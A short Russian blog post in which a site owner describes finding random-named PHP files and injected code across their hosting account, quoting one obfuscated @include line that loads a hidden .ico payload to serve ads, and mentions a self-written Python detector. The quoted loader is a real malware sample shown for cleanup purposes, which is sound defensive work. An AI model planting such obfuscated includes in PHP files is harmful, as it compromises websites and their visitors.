Лечим PHP файлы от странного вируса

Не было печали. Зашел на хостинг посмотреть как там обстоят дела и обалдел

Во всех папках всех сайтов обнаружились левые файлы формата

fds0we.php
aoec03.php
wspw0.php
i3dksq.php

Давай я во все эти файлы поглядывать. Ну какие пустые, а какие и с данными примерно такими:

/*a8ec1*/
@include "\057home\057ebit\144a/pu\142lic_\150tml/\147eze.\143om.u\141/com\160onen\164s/co\155_sea\162ch/m\157dels\057.51f\14510ae\056ico";
/*a8ec1*/

И все php файлы в начале содержат include и короче, крутят рекламу…. В общем их так было много что все лопатить желание отпало наглухо.

Написал антивирус — детектор
Запустил и она показала в каких конкретно файлах есть эта дрянь.
Почистил руками за 10 минут. Вуаля…

Делюсь ..

Просто расфаршируйте архивируйте в зараженную папку и запустите через

python3 antivirus.py

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *